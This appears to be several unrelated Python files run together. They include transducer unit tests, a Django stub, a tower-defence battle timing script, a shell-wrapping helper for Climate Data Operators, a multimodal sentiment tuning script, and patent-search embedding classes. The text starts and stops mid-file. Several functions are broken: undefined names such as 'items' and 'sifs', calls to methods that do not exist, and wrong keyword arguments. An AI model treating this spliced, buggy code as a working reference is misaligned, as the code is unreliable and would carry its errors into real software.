self.assertEqual(transducer.output_string, 'cac') self.assertEqual(transducer.edges, [(0, 1), (1, 0), (1, 2)]) def test_case_one(self): """ Test case one """ transducer = self.trans_one('test') self.assertEqual(transducer.output_string, 'pest') self.assertEqual(transducer.edges, [(0, 0), (1, 1), (2, 2), (3, 3)]) def test_case_two(self): transducer = self.trans_two('test') self.assertEqual(transducer.output_string, 'tst') self.assertEqual(transducer.edges, [(0, 0), (1, None), (2, 1), (3, 2)]) def test_case_three(self): transducer = self.trans_three('test') self.assertEqual(transducer.output_string, 'chest') self.assertEqual(transducer.edges, [(0, 0), (0, 1), (1, 2), (2, 3), (3, 4)]) def test_case_four(self): transducer = self.trans_four('test') self.assertEqual(transducer.output_string, 'pst') self.assertEqual(transducer.edges, [(0, 0), (1, 0), (2, 1), (3, 2)]) def test_case_six(self): transducer = self.trans_six('test') self.assertEqual(transducer.output_string, 'tset') self.assertEqual(transducer.edges, [(0, 0), (1, 2), (2, 1), (3, 3)]) def test_case_long_six(self): transducer = self.trans_six('esesse') self.assertEqual(transducer.output_string, 'sesese') def test_case_seven(self): transducer_as_written = self.test_seven_as_written('test') self.assertEqual(transducer_as_written.output_string, 'test') self.assertEqual(transducer_as_written.edges, [ (0, 0), (1, 1), (2, 2), (3, 3)]) transducer = self.trans_seven('test') self.assertEqual(transducer.output_string, 'tesht') self.assertEqual(transducer.edges, [(0, 0), (1, 1), (2, 2), (2, 3), (3, 4)]) def test_case_eight(self): transducer = self.trans_eight('test') self.assertEqual(transducer.output_string, 'chess') self.assertEqual(transducer.edges, [(0, 0), (1, 1), (1, 2), (2, 3), (3, 4)]) def test_case_nine(self): transducer = self.trans_nine('aa') self.assertEqual(transducer.output_string, '') self.assertEqual(transducer.edges, [(0, None), (1, None)]) def test_case_ten(self): transducer = self.trans_ten('abc') self.assertEqual(transducer.output_string, 'a') self.assertEqual(transducer.edges, [(0, 0), (1, 0), (2, 0)]) def test_case_acdc(self): transducer = Transducer( Mapping([{"in": "a{1}c{2}", "out": "c{2}a{1}c{2}"}])) tg = transducer('acdc') self.assertEqual(tg.output_string, 'cacdc') self.assertEqual(tg.edges, [(0, 1), (1, 0), (1, 2), (2, 3), (3, 4)]) def test_case_acac(self): transducer = Transducer(Mapping([{"in": "ab{1}c{2}", "out": "ab{2}"}])) transducer_default = Transducer( Mapping([{"in": "ab", "out": ""}, {"in": "c", "out": "ab"}])) tg = transducer('abcabc') tg_default = transducer_default('abcabc') self.assertEqual(tg.output_string, 'abab') self.assertEqual(tg_default.output_string, 'abab') self.assertEqual(tg.edges, [(0, None), (1, None), (2, 0), (2, 1), (3, None), (4, None), (5, 2), (5, 3)]) self.assertEqual(tg_default.edges, [(0, None), (1, None), (2, 0), (2, 1), (3, None), (4, None), (5, 2), (5, 3)]) if __name__ == "__main__": main() #!/usr/bin/python # ex:set fileencoding=utf-8: from __future__ import unicode_literals from django.db import models # Only needed for permissions class File(models.Model): pass rhofour/InfiniTDBackend import argparse import json import time from pathlib import Path import cattr from infinitd_server.game_config import GameConfig, GameConfigData, CellPos, ConfigId, Row, Col from infinitd_server.battle import Battle from infinitd_server.battleground_state import BattlegroundState from infinitd_server.battle_computer import BattleComputer def main(): parser = argparse.ArgumentParser( description="Small script to time battle calculation.") parser.add_argument('battleInputFile', metavar='file', type=str, help="A JSON file containing a battleground and wave.") parser.add_argument('-i', '--iters', action="store", type=int, default=1) args = parser.parse_args() gameConfigPath = Path('./game_config.json') with open(gameConfigPath) as gameConfigFile: gameConfigData = cattr.structure(json.loads(gameConfigFile.read()), GameConfigData) gameConfig = GameConfig.fromGameConfigData(gameConfigData) # Decode battle input from file with open(args.battleInputFile) as battleInputFile: battleInput = json.loads(battleInputFile.read()) battleground = BattlegroundState.from_dict(battleInput['battleground']) wave = battleInput['wave'] battleComputer = BattleComputer(gameConfig, debug=False) startTime = time.monotonic() for _ in range(args.iters): battleComputer.computeBattle(battleground, wave) duration = time.monotonic() - startTime print(f"Computed the {args.iters} battles in {duration:.3f}s " f"({duration / args.iters:.4f}s each)") if __name__ == "__main__": main() mycdo/__init__.py # -*- coding: utf-8 -*- """ Created on Wed Feb 04, 2015 @author: This module is the python interface to the command line tool of Climate Data Operators (CDO). Each CDO operator is wrapped into a string in a list, and the chain of CDO operators is realized by first adding these individual list together to form a long list and then tranforming the long list into a CDO command string. For example, get_ifile('data.nc') --> ['data.nc'] sel(name='sst') --> ['-selname,sst'] stat('tim','mean') --> ['-timmean'] and get_cdocmd( get_ifile('data.nc') + sel(name='sst') + stat('tim','mean'), ofile1='sst_timmean.nc' ) --> 'cdo -timmean -selname,sst data.nc sst_timmean.nc' Now we can use the os.system function to run the CDO command: os.system('cdo -timmean -selname,sst data.nc sst_timmean.nc') The module is designed such that it can take full advantage of the CDO chain operators. The module requires the CDO command tool as well as python module Numpy,netCDF4 and Pandas. The module also has the capability to manipulate data on a remote server as long as: 1) (required) The remote server has installed the CDO tools (required). 2) (optional) The remote server has the mycdo python module (e.g. in /home/wenchay/mypython/mycdo.py) 3) (optional) The remote server user home path has a python file named .cdo_dump.py with content as: import sys sys.path.append(mycdo_module_dir) import mycdo as mc mc.dump('tmp.nc') """ from __future__ import print_function try: # For Python 3.0 and later from urllib.request import urlopen except ImportError: # Fall back to Python 2's urllib2 from urllib2 import urlopen import os, os.path import tempfile from netCDF4 import Dataset import pandas as pd import numpy as np import shutil import glob import subprocess # parameters _server='' _userHome='/home/wenchay/' # # ######## functions that wrap cdo operators into strings in a list # ---- input file def get_ifile(ifile): '''Return a list with the ifile as the element. The ifile can be a string or list.''' if type(ifile) is list: return ifile else: fname = ifile if not os.path.exists(fname) and not fname.startswith('/'): fname = _userHome + fname return [fname] def get_ifiles(ifile): '''Same as the function get_ifile except that the file name include unix-style wildcards.''' fname = get_ifile(ifile)[0] fname = '\'' + fname + '\'' return [fname] def at_local(ifile): '''Condition on whether the ifile is on local machine or on the remote server.''' if type(ifile) is str: fname = ifile else: fname = ifile[0] if fname.startswith("'") and fname.endswith("'"): fname = fname[1:-1] if glob.glob(fname) or os.uname()[1] in _server: return True else: return False # ---- file operations # ---- selection def get_sel_param_name_list(): '''Get a list of parameter names used for the sel* operator.''' return ['name','stdname','param','code', 'level','levidx','grid','zaxis','ltype','tabnum', 'timestep','year','seas','mon','day','hour','time', 'date','smon', 'lonlatbox','indexbox' ] def get_select_param_name_list(): '''Get a list of parameter names used for the select operator.''' return ['name','param','code', 'level','levidx','ltype', 'minute','hour','day','month','year','timestep','timestep_of_year'] def sel(**kwargs): '''CDO sel* operators. Input arguments are key-value pairs with keys from the return of function get_sel_param_name_list(), and values are all string types with format similar to the CDO command.''' chain = list() for key in [key for key in kwargs.keys() if key in get_sel_param_name_list()]: chain += [ '-sel'+key+','+kwargs[key] ] if not chain: print ('Please choose proper input arguments with keys from:\n', get_sel_param_name_list() ) return return chain def select(**kwargs): '''CDO select operators. Input arguments are key-value pairs with keys from the return of function get_sel_param_name_list(), and values are all string types with format similar to the CDO command.\nFunction select can manipulate multiple files while sel* can only operate on a single file.''' chain = list() cmd = '-select' # generate the select commands for key in [key for key in kwargs.keys() if key in get_select_param_name_list()]: cmd += ',' + key + '=' + kwargs[key] if cmd=='-select': print ('''Please choose proper input arguments listed in the return of function get_select_param_name_list():\n''', get_select_param_name_list()) return else: chain = [cmd] # generate the sel* commands after the select for key in [key for key in kwargs.keys() if key not in get_select_param_name_list() and key in get_sel_param_name_list()]: chain += [ '-sel'+key+','+kwargs[key] ] return chain # ---- conditional selection # ---- comparison # ---- modification def get_change_param_name_list(): '''Get a list of parameter names used for the ch* operator''' return ['code','param', 'name','unit','level','levelc','levelv'] def get_set_param_name_list(): '''Get a list of parameter names used for the set* operator.''' return ['parttabp','partabn','partab','code','param', 'name','unit','level','ltype', 'date','time','day','mon','year','tunits', 'taxis','treftime','calendar' 'grid','gridtype','gridarea', 'zaxis', 'gatt','gatts', 'clonlatbox','cindexbox', 'missval','ctomiss','misstoc','rtomiss','vrange'] def change(param,old,new): if param in get_change_param_name_list(): return [ '-ch'+param+','+old+','+new ] else: print ('Please choose proper input parameters from the return of function get_change_param_name_list():\n',get_change_param_name_list()) def enlarge(grid): return [ '-enlarge,'+grid ] def invertlat(): return [ '-invertlat' ] def invertlev(): return [ '-invertlev' ] def set(**kwargs): chain = list() for key in [key for key in kwargs.keys() if key in get_set_param_name_list()]: chain += [ '-set'+key+','+kwargs[key] ] if not chain: print ('Please choose proper input arguments with keys from:\n' \ ,get_sel_param_name_list()) return return chain def shifttime(timeString): return [ '-shifttime,'+timeString ] # ---- arithmetic def arith(operator,ifile1=None,ifile2=None): chain = ['-'+operator ] if ifile1 is not None: chain = get_ifile(ifile1) + chain if ifile2 is not None: chain = get_ifile(ifile2) + chain return chain def expr(expression): return [ '-expr,' + '\'' + expression + '\'' ] # ---- statistics def get_stat_param_name_list(): '''return the list of list of dimension names.''' return [ ['zon','zonal','lon','longitude','longitudinal','x'], ['mer','meridional','lat','latitude','latitudinal','y'], ['fld','field'], ['vert','vertical'], ['tim','time'], ['year','yearly'], ['seas','season','seasonal'], ['mon','month','monthly'], ['day','daily'], ['hour','hourly'], ['ymon','multi-year monthly'], ['yday','multi-year daily'], ['run','running'] ] def stat(overDimension='time',statName='mean',N=None,ifile=None): # get the dimension name s = overDimension.lower() dimension = [par_list for par_list in get_stat_param_name_list() if s in par_list][0][0] # statistics name if statName.lower()=='percentile': statName = 'pctl' cmd = dimension + statName # running statistics with a num of points parameter if dimension=='run': cmd += ','+str(N) # whether to combine the operator and the ifile or not chain = [ '-'+cmd ] if ifile is not None: chain = get_ifile(ifile) + chain return chain def stat_pctl(ifile,N,overDimension='time'): '''percentile over time or similar dimension that needs three ifiles''' return get_ifile(ifile) + stat(overDimension,'max') \ + get_ifile(ifile) + stat(overDimension,'min') \ + get_ifile(ifile) + stat(overDimension,'pctl,'+str(N)) # ---- correlation def cor(dim='tim'): '''Correlation coefficients.Dimension can be tim or fld. ''' chain = list(); chain += [ '-' + dim + 'cor' ] return chain def covar(dim='tim'): '''Covariance. Dimension can be tim or fld. ''' chain = list(); chain += ['-' + dim + 'covar' ] return chain # ---- regression def regress(): return [ '-regres' ] def detrend(): return [ '-detrend' ] # ---- EOFs # ---- interpolation # ---- transformation # ---- import/export # ---- miscellaneous # ---- climate indices # # ######## low-level functions # ---- convert the chain of cdo operators to a command string that can be executed in shell def get_cdocmd(chain,ofile1=None,ofile2=None): '''Transforms the chain of operators into a string that is executable in Shell.\n\nchain is a list representing chains of operators.''' if ofile1 is None: ofile = '' else: ofile = ofile1 if ofile2 is not None: ofile += ' ' + ofile2 if len(chain)==1: cdocmd = 'cdo pardes ' + chain[0] else: cdocmd = 'cdo ' + ' '.join(chain[-1::-1]) + ' ' + ofile return cdocmd # ---- run system commands def run_command(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE,**kwargs): if type(cmd) is str: cmd = cmd.split() p = subprocess.Popen(cmd,stdout=stdout,stderr=stderr,**kwargs) stdout,stderr = p.communicate() exitCode = p.returncode if exitCode: print (stderr) else: print (stdout) return exitCode # ---- communicate with the remote server def run_cdo_remote(cdocmd=None,server=_server,otxtfile='.tmp.txt'): sshcmd = "ssh -t " + server + ' "' \ + cdocmd \ + " > " + otxtfile \ + '" ' print ('\n','-'*10, 'Connecting to server ...\n',sshcmd) if os.system(sshcmd)==0: with tempfile.NamedTemporaryFile(suffix='.txt') as tmp: copycmd = "scp " + server + ":~/" + otxtfile + ' ' + tmp.name print ('\n','-'*10,'Download and show what has been shown on remote server screen ...\n',copycmd) if os.system(copycmd)==0: # scp the result file to the local temp file return os.system('cat ' + tmp.name) def download_datafile(datafile_remote='.tmp.nc',server=_server): tmp = tempfile.NamedTemporaryFile(suffix='.nc') copycmd = "scp " + server + ":~/" + datafile_remote + ' ' + tmp.name print ('\n','-'*10,'Download data file on remote server ...\n',copycmd) os.system(copycmd) return tmp # ---- convert the chain of cdo operators into python file objects def get_data_file_obj(chain): '''Generates a temporary file object pointing to the output netcdf file. \n\nchain can be a list of cdo commands or a string of input file name.''' if type(chain) is str: datafile = chain if at_local(datafile): # data is at local tmp = open(datafile) else: # data is at remote server datafile = get_ifile(chain)[0] tmp = download_datafile(datafile_remote=datafile,server=_server) elif type(chain) is list: if at_local(chain): # data is at local tmp = tempfile.NamedTemporaryFile(suffix='.nc') cdocmd = get_cdocmd(chain,ofile1=tmp.name) print ('\n','-'*10,'Running cdo ...') print (cdocmd) os.system(cdocmd) else: # data is at remote server if run_cdo_remote( cdocmd=get_cdocmd(chain,ofile1='.tmp.nc'),server=_server )==0: tmp = download_datafile(datafile_remote='.tmp.nc',server=_server) return tmp # # ######## high-level functions # ---- query information about the ifile or modified ifile def get_show_param_name_list(): '''Get a list of parameter names used for the show* operator.''' return ['format','code', 'name','stdname', 'level','ltype', 'year','mon','date','time','timestamp' ] def get_des_param_name_list(): '''Get a list of paramerter name used for the show* operator.''' return ['par','grid','zaxis','vct'] def info(ifile): '''Equivalent to the cdo operator infon.''' ifile = get_ifile(ifile) cdocmd = 'cdo infon ' + ' '.join(ifile[-1::-1]) if at_local(ifile): return run_command(cdocmd) else: return run_cdo_remote(cdocmd=cdocmd) def sinfo(ifile): '''Equivalent to the cdo operator sinfon.''' ifile = get_ifile(ifile) cdocmd = 'cdo sinfon ' + ' '.join(ifile[-1::-1]) if at_local(ifile): return run_command(cdocmd) else: return run_cdo_remote(cdocmd=cdocmd) def show(ifile,param='par'): cdocmd = ' '.join( get_ifile(ifile)[-1::-1] ) if param in get_show_param_name_list(): cdocmd = 'cdo show' + param + ' ' + cdocmd elif param in get_des_param_name_list(): cdocmd = 'cdo ' + param + 'des ' + cdocmd else: print ('Please choose proper params from the return of function get_show_param_name_list() or the function get_des_param_name_list():\n',get_show_param_name_list(),'\n or \n',get_des_param_name_list()) return if at_local(ifile): return run_command(cdocmd) else: return run_cdo_remote(cdocmd) def look(chain): '''Dump a local netcdf file, or dump a remote netcdf file and then download the results. \n\n The input argument chain can be either a string (netcdf file name) or a list representing a chain of cdo operators.''' if at_local(chain): with get_data_file_obj(chain) as tmp: # dump the output netcdf file print ('\n','-'*10,'Data file information:...') filesize = os.path.getsize(tmp.name); units = 'B' if filesize > 10000: filesize /= 1000; units = 'K' if filesize > 10000: filesize /= 1000; units = 'M' print (tmp.name+': ',str(filesize) + units) with Dataset(tmp.name) as ncobj: vnames = ncobj.variables.keys() for vname in vnames: if hasattr(ncobj.variables[vname],'units'): units = ncobj.variables[vname].units else: units = 'units N/A' print (vname, zip(ncobj.variables[vname].dimensions, ncobj.variables[vname].shape), '; ', units) else:# not at_local(chain) try: if type(chain) is str or ( type(chain) is list and len(chain)==1 ): fname = get_ifile(chain)[0] cdocmd = "ln -sfn " + fname + " ~/.tmp.nc && python .cdo_dump.py && rm ~/.tmp.nc" else: cdocmd = get_cdocmd(chain,output='.tmp.nc') + " && python .cdo_dump.py " run_cdo_remote(cdocmd=cdocmd) except: ifile = get_ifile(chain) cdocmd = 'cdo sinfon ' + ' '.join( ifile[-1::-1] ) run_cdo_remote(cdocmd=cdocmd) # ---- save result data file into ofile def save(chain,ofile1=None,ofile2=None): '''save the final netcdf file to the output file.''' if ofile1 is not None: if at_local(chain): cdocmd = get_cdocmd(chain=chain,ofile1=ofile1,ofile2=ofile2) if os.system(cdocmd)==0: print ('\n'+'-'*10,'File has been saved to','\nofile1:',ofile1,'\nofile2:',ofile2) else: ofile1 = get_ifile(ofile1)[0] if ofile2 is not None: ofile2 = get_ifile(ofile2)[0] cdocmd = get_cdocmd(chain=chain,ofile1=ofile1,ofile2=ofile2) if run_cdo_remote(cdocmd=cdocmd)==0: print ('\n'+'-'*10,'File has been saved on server to','\nofile1:',ofile1,'\nofile2:',ofile2) else: print ('Please choose output file names.') # ---- read result data file into memory as ndarray or dictionary of ndarray def get_months(season='Annual'): months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec', 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun'] if season.lower()=='annual': # 12 months array months = months[:12] elif season in months: # season contains only one month months = [season] else: # season defined by consecutive month initials months_short = 'JFMAMJJASONDJFMAMJ' i = months_short.find(season) N = len(season) months = months[i:i+N] return months def num2time(num,units): '''Convert expression of time from days/months since ... into pandas PeriodIndex.''' if units.lower().startswith('months since'): period = pd.Period(units.split()[2][:7]) elif units.lower().startswith('days since'): period = pd.Period(units.split()[2]) else: period = None return pd.PeriodIndex(period + np.floor(num).astype('int')) def read(chain,varname=None): '''Read the output netcdf file into memory as a dictionary. \n\n chain can be either a string (netcdf file name) or a list representing chains of operators. \n\n return a numpy array value if vname is not None.''' with get_data_file_obj(chain=chain) as tmp: with Dataset(tmp.name) as ncobj: vnames = ncobj.variables.keys() zzDict = dict() if varname is None: vnames = ncobj.variables.keys() else: vnames = [varname] for vname in vnames: zzDict[vname] = ncobj.variables[vname][:] if vname in ['time','T','T2']: # change the time units tN = ncobj.variables[vname][:] units = ncobj.variables[vname].units zzDict[vname] = num2time(tN,units) if varname is None: return zzDict else: return zzDict[varname] # import math import os import sys from argparse import ArgumentParser import pytorch_lightning as pl import torch.nn as nn import torch.nn.functional as F import torch.optim as optim from filelock import FileLock from loguru import logger from ray import tune from slp.config.config_parser import make_cli_parser, parse_config from slp.config.omegaconf import OmegaConfExtended as OmegaConf from slp.data.cmusdk import mosi from slp.data.collators import MultimodalSequenceClassificationCollator from slp.data.multimodal import MOSI from slp.modules.classifier import TransformerLateFusionClassifier from slp.plbind import ( FromLogits, PLDataModuleFromDatasets, PLModule, make_trainer, make_trainer_for_ray_tune, ) from slp.plbind.dm import split_data from slp.plbind.module import MultimodalTransformerClassificationPLModule from slp.util.log import configure_logging from slp.util.tuning import run_tuning modalities = {"text", "audio", "visual"} def get_data( seed=None, remove_pauses=False, pad="front", max_length=-1, train=True, val=True, test=False, ): pad_front = False pad_back = False if pad == "front": pad_front = True elif pad == "back": pad_back = True # with FileLock(os.path.expanduser("~/data.lock")): train_data, dev_data, test_data, w2v = mosi( "/home/efthygeo/experimental/pytorch-slp/slp/data/mosi_final_aligned/", pad_front=pad_front, pad_back=pad_back, max_length=max_length, remove_pauses=remove_pauses, modalities=modalities, already_aligned=True, align_features=False, # cache="./cache/mosi.p", ) train = MOSI(train_data, modalities=modalities, binary=False, text_is_tokens=False) dev = MOSI(dev_data, modalities=modalities, binary=False, text_is_tokens=False) test = MOSI(test_data, modalities=modalities, binary=False, text_is_tokens=False) if not test: test = None return train, dev, test def get_parser(): parser = ArgumentParser("MOSI Tuning") parser.add_argument( "--hidden", dest="model.hidden_size", type=int, default=100, help="Intermediate hidden layers for linear module", ) parser.add_argument( "--inner", dest="model.inner_size", type=int, default=200, help="Inner size", ) parser.add_argument( "--heads", dest="model.num_heads", type=int, default=2, help="Number of heads", ) parser.add_argument( "--layers", dest="model.num_layers", type=int, default=2, help="Number of transformer layers", ) parser.add_argument( "--prenorm", dest="model.prenorm", action="store_true", help="Use prenorm" ) parser.add_argument( "--scalenorm", dest="model.scalenorm", action="store_true", help="Use scalenorm" ) parser.add_argument("--dropout", dest="model.dropout", default=0.1, help="Dropout") parser.add_argument( "--kernel-size", dest="model.kernel_size", default=None, help="Residual convolution in attention", ) return parser def train_mosi(config, train=None, val=None): # Convert dictionary to omegaconf dictconfig object config = OmegaConf.create(config) train, val, _ = get_data( remove_pauses=config.preprocessing.remove_pauses, pad=config.preprocessing.pad, max_length=config.preprocessing.max_length, ) collate_fn = MultimodalSequenceClassificationCollator(device="cpu") # Create data module config.data.batch_size_eval = config.data.batch_size ldm = PLDataModuleFromDatasets( train, val=val, seed=config.seed, no_test_set=True, collate_fn=collate_fn, **config.data ) feature_sizes = {"audio": 74, "visual": 35, "text": 300} # Create model, optimizer, criterion, scheduler model = TransformerLateFusionClassifier( feature_sizes, 1, max_length=512, nystrom=False, kernel_size=config.model.kernel_size, num_layers=config.model.num_layers, num_heads=config.model.num_heads, dropout=config.model.dropout, hidden_size=config.model.hidden_size, inner_size=config.model.inner_size_multiple * config.model.hidden_size, # inner_size=config.model.inner_size, prenorm=config.model.prenorm, scalenorm=config.model.scalenorm, ) optimizer = getattr(optim, config.optimizer)(model.parameters(), **config.optim) criterion = nn.MSELoss() lr_scheduler = None if config.lr_scheduler: lr_scheduler = optim.lr_scheduler.ReduceLROnPlateau( optimizer, **config.lr_schedule ) lm = MultimodalTransformerClassificationPLModule( model, optimizer, criterion, lr_scheduler=lr_scheduler, hparams=config, ) # Map Lightning metrics to ray tune metris. metrics_map = {"validation_loss": "best_score"} assert ( config["tune"]["metric"] in metrics_map.keys() ), "Metrics mapping should contain the metric you are trying to optimize" # Train model trainer = make_trainer_for_ray_tune(metrics_map=metrics_map, **config.trainer) trainer.fit(lm, datamodule=ldm) def configure_search_space(config): config["preprocessing"] = { "remove_pauses": tune.choice([True, False]), "pad": tune.choice(["front", "back"]), "max_length": tune.choice([-1, 20, 50, 75]), } config["model"] = { "hidden_size": tune.qrandint(64, 384, q=8), # "inner_size": tune.choice([32, 64, 128, 256, 512, 1024, 2048]), # "inner_size_multiple": tune.qrandint(2, 4, q=2), "inner_size_multiple": 2, "num_heads": tune.choice([2, 4, 8]), # "num_layers": tune.randint(1, 4), "num_layers": 3, # "prenorm": tune.choice([False, True]), "prenorm": False, "scalenorm": tune.choice([False, True]), # "kernel_size": tune.choice([None, 11, 33]), "kernel_size": 33, "dropout": tune.uniform(0.2, 0.4), } # config["model"]["inner_size"] = tune.sample_from(lambda spec: spec.config.hidden_size * np.random.choice([2, 4])) # config["inner_size_multiple"] * config["model"]["hidden_size"] # config["lr_scheduler"] = tune.choice([False, True]) config["lr_scheduler"] = True # config["lr_schedule"]["patience"] = tune.randint(2, 5) config["lr_schedule"]["patience"] = 5 # config["lr_schedule"]["factor"] = tune.loguniform(0.1, 0.5) config["lr_schedule"]["factor"] = 0.2 # config["optimizer"] = tune.choice(["SGD", "Adam", "AdamW"]) config["optimizer"] = "AdamW" # config["optim"]["lr"] = tune.loguniform(1e-4, 1e-2) config["optim"]["lr"] = 1e-4 # config["optim"]["weight_decay"] = tune.loguniform(1e-4, 1e-1) config["optim"]["weight_decay"] = 5e-4 # config["data"]["batch_size"] = tune.choice([8, 16, 32, 64]) config["data"]["batch_size"] = tune.choice([8, 16]) config["trainer"]["gradient_clip_val"] = tune.choice([0, 0.1]) # config["trainer"]["gradient_clip_val"] = 0.1 return config if __name__ == "__main__": # SETUP ################################################## parser = get_parser() parser = make_cli_parser(parser, PLDataModuleFromDatasets) # type: ignore config = parse_config(parser, parser.parse_args().config) if config.trainer.experiment_name == "experiment": config.trainer.experiment_name = "mosi-tuning" configure_logging() if config.seed is not None: logger.info("Seeding everything with seed={seed}") pl.utilities.seed.seed_everything(seed=config.seed) # These arguments may be provided from the command line or a config file config = OmegaConf.to_container(config) # config["tune"] = { # "num_trials": 10, # "cpus_per_trial": 1, # "gpus_per_trial": 0.12, # "metric": "accuracy", # "mode": "max", # } config["wandb"] = {} config["wandb"]["project"] = "tuning-mosi-search-space-2" # config["trainer"]["max_epochs"] = 15 config = OmegaConf.create(config) # Handle train / val splitting. # All trials should run on the same validation set best_config = run_tuning( config, # type: ignore "configs/best.mosi.tune.yml", train_mosi, configure_search_space, ) vsvarunsharma10/pqai import numpy as np from nltk.tokenize import RegexpTokenizer import math import numba import re import json from sklearn.decomposition import TruncatedSVD from core.utils import is_cpc_code, is_patent_number from config.config import models_dir from core.db import get_patent_data from config.config import models_dir as MODELS_DIR class GloveWordEmbeddings(): def __init__(self): self.models_dir = MODELS_DIR self.vocab_file = self.models_dir + '/glove-vocab.json' self.dict_file = self.models_dir + '/glove-dictionary.json' self.dfs_file = self.models_dir + '/dfs.json' self.embeddings_file = self.models_dir + '/glove-We.npy' self.vocab = None self.dictionary = None self.dfs = None self.sifs = None self.embeddings = None self.dims = None self._load() def _load(self): with open(self.vocab_file) as file: self.vocab = json.load(file) with open(self.dict_file) as file: self.dictionary = json.load(file) with open(self.dfs_file) as file: self.dfs = json.load(file) self.embeddings = np.load(self.embeddings_file) self.sifs = { word:self.df2sif(word, self.dfs) for word in self.dfs } self.dims = self.embeddings.shape[1] def __len__(self): return self.embeddings.shape[0] @staticmethod def df2sif(word, dfs): n = dfs[word] N = dfs['the'] p = n / N a = 0.01 w = a / (a + p) return w def __getitem__(self, item): if type(item) is int: return self.embeddings[item] elif type(item) is str: item = item if item in self.dictionary else '' return self.embeddings[self.dictionary[item]] else: return np.zeros(self.dims) def get_sif (self, word): return self.sifs.get(word, 1.0) class Embeddings(): """Base class for a collection of items and their corresponding vectors, e.g., word embeddings obtained from word2vec or GloVe. Attributes: items (list): Item labels vectors (iterable): An array of item vectors """ def __init__(self, items, vectors): """Initialize Args: items (list): Labels with which items are identified. Labels must be hashable (used in an internal dictionary). vectors (ndarray): An array containing vectors for items in the same sequence as the in the `items` list. Raises: Exception: if the number of items are NOT equal to the number of vectors, i.e., lack of one-to-one mapping between items and vectors. """ if len(items) != len(vectors): raise Exception('Unequal number of items and vectors.') self.items = items self.vectors = vectors self._dict = self._make_dict(self) def _make_dict(self): """Make a dictionary for quick look up of item vectors. """ self._dict = { item: i for i, item in enumerate(self.items) } def __getitem__(self, item): """Get the vector for given item. Args: item (str): Item label Returns: ndarray: Item vector """ i = self._dict[item] return self.vectors[i] class WordEmbeddings(Embeddings): """Class for collection of word embeddings. Attributes: PAD (str): Label for the padding token UNK (str): Label for the unknown token """ def __init__(self, words, embeddings, pad='', unk=''): """Initialize word embeddings Args: words (list): Words embeddings (ndarray): Word embeddings (vectors) pad (str, optional): Label for the padding token, usually filled in empty places in a string having fewer words than the required sequence length unk (str, optional): Label for the unknown tokens """ super().__init__(items, embeddings) self.PAD = pad self.UNK = unk def __getitem__(self, word): """Return vector for a given word. If the vector for the given word isn't known, then the vector for the unknown token `` is returned. Args: word (str): A word Returns: ndarray: The vector corresponding to the given word """ if word not in self._dict: return self.__getitem__(self.UNK) return super().__getitem__(word) class Text(str): def __init__(self, text): self._text = text self._default_tokenizer = RegexpTokenizer(r'\w+') def to_tokens(self, tokenizer=None): if not tokenizer: tokenizer = self._default_tokenizer tokens = tokenizer.tokenize(self._text_lower) return TokenSequence(tokens) @property def _text_lower(self): return self._text.lower() def __repr__(self): prefix = 'Text: ' if len(self._text) < 77: return prefix + self._text else: return prefix + self._text[:17] + '...' class TokenSequence(list): def __init__(self, tokens): super().__init__(tokens) self._tokens = tokens def to_vector_sequence(self, token_embeddings): vectors = [token_embeddings[token] for token in self._tokens] return VectorSequence(self._tokens, vectors) @property def tokens(self): return self._tokens class VectorSequence(): def __init__(self, labels, vectors): self._labels = labels self._sequence = np.array(vectors) self._n = len(vectors) self._dims = self._sequence.shape[1] self._fixed_length = None self._default_interaction = Interaction() self._default_interaction.metric = 'cosine' self._default_interaction.amplify = False self._default_interaction.reinforce = True self._default_interaction.context = True self._default_interaction.window = 5 @property def labels(self): return self._labels def __repr__(self): text = f'VectorSequence: {len(self._labels)} labels, {len(self._sequence)} vectors;' text += f' Labels: {", ".join(self._labels[:5])}' text += ', ...' if self._labels[5:] else '' return text def _weighted_by_tokens(self, weights): W = [weights[token] for token in self._tokens] return self.weighted_by_vectors(W) def _weighted_by_vectors(self, W): W = np.array(W).reshape(1, -1) return self._sequence * W.T def weigh(self, weights): if isinstance(weights, dict): self._weighted_by_tokens(weights) self._weighted_by_vector(weights) @property def redundancy_vector(self): interact = self._default_interaction.interact interactions = interact(self, self) interactions = np.tril(interactions._matrix, -1) return np.max(interactions, axis=1) @property def matrix(self): if self._fixed_length is None: return self._sequence if self._n > self._fixed_length: return self._truncated else: return self._padded @property def _truncated(self): return self._sequence[:self._fixed_length] @property def _padded(self): r = self._fixed_length - self._n shape = (r, self._dims) padding = np.zeros(shape) return np.concatenate((self._sequence, padding)) def set_length(self, n): self._fixed_length = n return self @property def normalized_matrix(self): row_magnitudes = np.sqrt(np.sum(self._sequence*self._sequence, axis=1, keepdims=True)) row_magnitudes += np.finfo(float).eps return self._sequence / row_magnitudes class Interaction(): def __init__(self, metric='cosine', context=False, amplify=False, reinforce=False, window=5): self.metric = metric self.context = context self.amplify = amplify self.reinforce = reinforce self.window_size = window self._amplify_matrix = np.vectorize(self._amplify) self._a = 3.2 self._b = 7.5 self._c = 0.46 self._f = 1.0 self._h = 0.0 def _dot_interaction(self, A, B): return np.matmul(A, B.T) def _cosine_interaction(self, A, B): An = self._normalize_rows(A) Bn = self._normalize_rows(B) return self._dot_interaction(An, Bn) def _euclidean_interaction(self, A, B): diff = A-B sq_diff = diff*diff return np.sqrt(sq_diff) def _context_sequence(self, vector_seq): M = vector_seq.matrix C = np.zeros(M.shape) C *= np.array([sifs[word] if word in sifs else 1.0 for word in vector_seq.labels]).reshape((-1, 1)) r = min(len(M-1), self.window_size+1) for i in range(1, r): C[i:,:] += M[:-i,:] C[:-i,:] += M[i:,:] return C def interact(self, vector_seq_A, vector_seq_B): A = vector_seq_A.matrix B = vector_seq_B.matrix I = self.interaction_fn(A, B) I = self._amplifier(I) if self.amplify else I if not self.context: return InteractionMatrix(I) Ac = self._context_sequence(vector_seq_A) Bc = self._context_sequence(vector_seq_B) Ic = self.interaction_fn(Ac, Bc) Ic = self._amplifier(Ic) if self.amplify else Ic if not self.reinforce: return InteractionMatrix(I+Ic) M = self._reinforce(I, Ic) return InteractionMatrix(M) @property def interaction_fn(self): if self.metric == 'cosine': return self._cosine_interaction elif self.metric == 'dot': return self._dot_interaction elif self.metric == 'euclidean': return self._euclidean_interaction @staticmethod def _normalize_rows(M): row_magnitudes = np.sqrt(np.sum(M*M, axis=1, keepdims=True)) 